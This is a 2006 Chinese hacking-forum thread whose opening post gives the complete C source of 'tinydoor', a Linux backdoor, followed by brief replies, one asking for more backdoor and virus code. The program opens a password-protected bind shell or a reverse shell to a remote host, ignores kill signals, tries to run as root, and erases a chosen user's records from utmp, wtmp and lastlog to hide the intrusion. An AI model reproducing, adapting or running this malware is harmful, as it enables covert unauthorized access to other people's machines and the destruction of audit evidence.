返回列表 回复 发帖
admin

信息军队-上尉
1#
打印
tT
发表于 2006-6-2 09:19 | 只看该作者

Liunx backdoor 源代码

  1. /*
  2. * A tiny Unix/Linux backdoor V. 0.3

  4. * written by W.Z.T welcome to [url]http://www.ncph.net[/url]

  6. * gcc -o tinydoor tinydoor.c

  8. * usage:

  10. * conncet to server:./tinydoor 2006
  11. nc -vv 127.0.0.1 2006

  13. * conncet back to server:nc -vv -l -p 2006
  14. ./tinydoor 127.0.0.1 2006

  16. * clearn logs:./tinydoor -c root(username)

  18. * default password is:tthacker,you can change it by yourself

  20. */

  22. #include <stdio.h>
  23. #include <string.h>
  24. #include <stdlib.h>
  25. #include <sys/types.h>
  26. #include <sys/wait.h>
  27. #include <errno.h>
  28. #include <dirent.h>
  29. #include <signal.h>
  30. #include <netinet/in.h>
  31. #include <netdb.h>
  32. #include <unistd.h>
  33. #include <string.h>
  34. #include <fcntl.h>
  35. #include <utmp.h>
  36. #include <lastlog.h>
  37. #include <pwd.h>
  38. #include <sys/socket.h>

  40. #define WTMP_NAME "/var/log/wtmp"
  41. #define UTMP_NAME "/var/run/utmp"
  42. #define LASTLOG_NAME "/var/log/lastlog"

  44. #define MAXARGS 30
  45. #define ARGLEN 200
  46. #define USAGES1 "\nconnected successful.it's a tiny binshell.Good Luck:)\n\n"
  47. #define USAGES2 "Type \"rshell\" or \"cshell\" or \"myshell\":\n"
  48. #define RSHELL "\nit's a rootshell\n\n"
  49. #define CSHELL "\nuse common shell:\n\n"
  50. #define MYSHELL "\nuse myshell now:\n\n"
  51. #define ERRORS "\nDo you want to get my shell? FUCK------->"
  52. #define PASS "tthacker" /* default password */
  53. #define LOGIN "login:"

  55. void shell(int sock_id);
  56. void myshell(void);
  57. void do_ls(char []);
  58. void backdoor(char *hosts,char *port); /* connect back to server */
  59. void bindoor(char *port); /* connect to server */
  60. void cannot_stop_me(void);
  61. void clearn_utmp(char *who);
  62. void clearn_wtmp(char *who);
  63. void clearn_lastlog(char *who);

  65. char command[ARGLEN];
  66. char error1[MAXARGS];
  67. char type1[MAXARGS];
  68. char type2[MAXARGS];
  69. char check[ARGLEN];

  71. int fp;

  73. int main(int argc,char *argv[])
  74. {
  75. if(argc==3&&!strcmp(argv[1],"-c")){
  76. clearn_utmp(argv[2]);
  77. clearn_wtmp(argv[2]);
  78. clearn_lastlog(argv[2]);
  79. }
  80. else{
  81. backdoor(argv[1],argv[2]);
  82. }
  83. if(argc==2){
  84. bindoor(argv[1]);
  85. }

  87. return 0;
  88. }

  90. void backdoor(char *hosts,char *port)
  91. {
  92. struct sockaddr_in serv_addr;
  93. struct hostent *host;
  94. int sock_fd;

  96. cannot_stop_me();

  98. if((host=gethostbyname(hosts))==NULL){
  99. herror("gethostbyname");
  100. exit(1);
  101. }

  103. if((sock_fd=socket(AF_INET,SOCK_STREAM,0))==-1){
  104. perror("socket");
  105. exit(1);
  106. }

  108. serv_addr.sin_family=AF_INET;
  109. serv_addr.sin_port=htons(atoi(port));
  110. serv_addr.sin_addr=*((struct in_addr *)host->h_addr);

  112. bzero(&(serv_addr.sin_zero),8);

  114. strcpy(error1,inet_ntoa(INADDR_ANY));
  115. error1[strlen(error1)]='\0';

  117. if(connect(sock_fd,(struct sockaddr *)&serv_addr,sizeof(struct sockaddr))==-1){
  118. perror("conncet");
  119. exit(1);
  120. }
  121. shell(sock_fd);
  122. }

  124. void bindoor(char *port)
  125. {
  126. int val=1;
  127. int sock_fd,client_fd;
  128. struct sockaddr_in my_addr;
  129. struct sockaddr_in remote_addr;
  130. int sin_size;

  132. cannot_stop_me();

  134. if((sock_fd=socket(AF_INET,SOCK_STREAM,0))==-1){
  135. perror("socket");
  136. exit(1);
  137. }

  139. if(setsockopt(sock_fd,SOL_SOCKET,SO_REUSEADDR,(char *)&val,sizeof(val))<0){
  140. perror("setsockopt");
  141. }

  143. my_addr.sin_family=AF_INET;
  144. my_addr.sin_port=htons(atoi(port));
  145. my_addr.sin_addr.s_addr=INADDR_ANY;

  147. bzero(&(my_addr.sin_zero),8);

  149. if(bind(sock_fd,(struct sockaddr *)&my_addr,sizeof(struct sockaddr))==-1){
  150. perror("bind");
  151. exit(1);
  152. }

  154. if(fork()!=0)
  155. exit(0);

  157. setpgrp();

  159. if(fork()!=0)
  160. exit(0);

  162. if(listen(sock_fd,MAXARGS)==-1){
  163. perror("listen");
  164. exit(1);
  165. }

  167. strcpy(error1,inet_ntoa(remote_addr));
  168. error1[strlen(error1)]='\0';

  170. while(1){
  171. sin_size=sizeof(struct sockaddr_in);
  172. if((client_fd=accept(sock_fd,(struct sockaddr *)&remote_addr,&sin_size))==-1){
  173. perror("accept");
  174. exit(1);
  175. }
  176. shell(client_fd);
  177. }
  178. }

  180. void shell(int sock_id)
  181. {
  182. write(sock_id,LOGIN,sizeof(LOGIN));
  183. read(sock_id,check,sizeof(check));

  185. if(strstr(check,PASS)!=NULL){
  186. if(!fork()){
  187. dup2(sock_id,0);
  188. dup2(sock_id,1);
  189. dup2(sock_id,2);
  190. write(1,USAGES1,strlen(USAGES1));
  191. shell:
  192. write(1,USAGES2,strlen(USAGES2));
  193. read(0,type1,ARGLEN);
  194. if(strstr(type1,"rshell")!=NULL){
  195. write(1,RSHELL,sizeof(RSHELL));
  196. execl("/bin/sh","sh",(char *)0);
  197. goto shell;
  198. }
  199. else if(strstr(type1,"cshell")!=NULL){
  200. write(1,CSHELL,sizeof(CSHELL));
  201. read(0,type2,ARGLEN);
  202. type2[strlen(type2-1)]='\0';
  203. write(1,type2,sizeof(type2));
  204. do_ls(type2);
  205. }
  206. else if(strstr(type1,"myshell")!=NULL){
  207. write(1,MYSHELL,sizeof(MYSHELL));
  208. myshell();
  209. }
  210. else if(strstr(type1,"exit")!=NULL){
  211. close(sock_id);
  212. exit(1);
  213. }
  214. else{
  215. goto shell;
  216. }
  217. close(sock_id);
  218. exit(0);
  219. }
  220. }
  221. else{
  222. write(sock_id,ERRORS,strlen(ERRORS));
  223. write(sock_id,error1,strlen(error1));
  224. close(sock_id);
  225. }
  226. close(sock_id);
  227. }

  229. void do_ls( char dirname[] )
  230. {
  231. DIR *dir_ptr;
  232. struct dirent *direntp;

  234. if ( ( dir_ptr = opendir( dirname ) ) == NULL )
  235. fprintf(stderr,"ls1: cannot open %s\n", dirname);
  236. else
  237. {
  238. while ( ( direntp = readdir( dir_ptr ) ) != NULL )
  239. printf("%s\n", direntp->d_name );
  240. closedir(dir_ptr);
  241. }
  242. }

  244. void myshell(void)
  245. {
  246. char *arglist[MAXARGS+1];
  247. int numargs;
  248. char argbuf[ARGLEN];
  249. char *makestring();

  251. numargs = 0;
  252. while ( numargs < MAXARGS )
  253. {
  254. write(1,"command:",strlen("command:"));
  255. if ( fgets(argbuf, ARGLEN, stdin) && *argbuf != '\n' ){
  256. if(strstr(argbuf,"exit")!=NULL){
  257. exit(0);
  258. }
  259. arglist[numargs++] = makestring(argbuf);
  260. }
  261. else
  262. {
  263. if ( numargs > 0 ){
  264. arglist[numargs]=NULL;
  265. execute( arglist );
  266. numargs = 0;
  267. }
  268. }
  269. }
  270. }

  272. execute( char *arglist[] )
  273. {
  274. int pid,exitstatus;

  276. pid = fork();
  277. switch( pid ){
  278. case -1:
  279. perror("fork failed");
  280. exit(1);
  281. case 0:
  282. execvp(arglist[0], arglist);
  283. perror("execvp failed");
  284. exit(1);
  285. default:
  286. while( wait(&exitstatus) != pid )
  287. ;
  288. printf("child exited with status %d,%d\n",
  289. exitstatus>>8, exitstatus&0377);
  290. }
  291. }

  293. char * makestring( char *buf )
  294. {
  295. char *cp, *malloc();

  297. buf[strlen(buf)-1] = '\0';
  298. cp = malloc( strlen(buf)+1 );
  299. if ( cp == NULL ){
  300. fprintf(stderr,"no memory\n");
  301. exit(1);
  302. }
  303. strcpy(cp, buf);
  304. return cp;
  305. }

  307. void cannot_stop_me(void)
  308. {
  309. setuid(0);
  310. setgid(0);
  311. seteuid(0);
  312. setegid(0);

  314. signal(SIGCHLD,SIG_IGN);
  315. signal(SIGHUP,SIG_IGN);
  316. signal(SIGTERM,SIG_IGN);
  317. signal(SIGINT,SIG_IGN);
  318. signal(SIGKILL,SIG_IGN);
  319. if(fork())
  320. exit(0);
  321. }

  323. void clearn_utmp(char *who)
  324. {
  325. struct utmp ent;

  327. if((fp=open(UTMP_NAME,O_RDWR))<0){
  328. perror("open");
  329. }
  330. while(read(fp,&ent,sizeof(ent))>0){
  331. if(!strncmp(ent.ut_user,who,sizeof(ent))){
  332. bzero((char *)&ent,sizeof(ent));
  333. lseek(fp,-(sizeof(ent)),SEEK_CUR);
  334. write(fp,&ent,sizeof(ent));
  335. }
  336. }
  337. printf("clearn %s done.\n",UTMP_NAME);
  338. }

  340. void clearn_lastlog(char *who)
  341. {
  342. struct passwd *pwd;
  343. struct lastlog new;

  345. if((pwd=getpwnam(who))==NULL){
  346. printf("No such user.\n");
  347. exit(0);
  348. }

  350. if((fp=open(LASTLOG_NAME,O_RDWR))<0){
  351. printf("clearn %s failed\n",LASTLOG_NAME);
  352. }
  353. bzero((char *)&new,sizeof(new));
  354. lseek(fp,(long)pwd->pw_uid*sizeof(struct lastlog),0);
  355. write(fp,&new,sizeof(new));
  356. printf("clearn %s done.\n",LASTLOG_NAME);
  357. close(fp);
  358. }

  360. void clearn_wtmp(char *who)
  361. {
  362. struct utmp ent;

  364. if((fp=open(WTMP_NAME,O_RDWR))<0){
  365. printf("Can't open the file %s \n",WTMP_NAME);
  366. }
  367. while(read(fp,&ent,sizeof(ent))>0){
  368. if(!strncmp(ent.ut_user,who,sizeof(ent))){
  369. bzero((char *)&ent,sizeof(ent));
  370. lseek(fp,-(sizeof(ent)),SEEK_CUR);
  371. write(fp,&ent,sizeof(ent));
  372. }
  373. }
  374. printf("claern %s done.\n",WTMP_NAME);
  375. close(fp);
  376. }
复制代码
收藏 分享 评分
回复 引用

订阅 TOP

tasirose

信息军队-列兵
2#
发表于 2006-6-4 17:20 | 只看该作者
回复 引用

TOP

钦锋

信息军队-中士
3#
发表于 2006-7-10 06:04 | 只看该作者

回复 引用

TOP

Syue锁锁

信息军队-少校
4#
发表于 2006-7-14 18:51 | 只看该作者
看不懂啊~
回复 引用

TOP

fenye0428-

信息军队-列兵
5#
发表于 2006-7-23 04:20 | 只看该作者
看不懂啊
回复 引用

TOP

瞬间

信息军队-中士
6#
发表于 2007-2-28 10:40 | 只看该作者

呵呵
回复 引用

TOP

阿剑

信息军队-下士
7#
发表于 2007-4-18 08:53 | 只看该作者
哎  拿个分算了
回复 引用

TOP

jibaxaut

信息军队-中士
8#
发表于 2008-6-14 18:12 | 只看该作者
我对Linux下的病毒后门非常非常的感兴趣,希望楼主继续放一些这方面的东西!!!
回复 引用

TOP

返回列表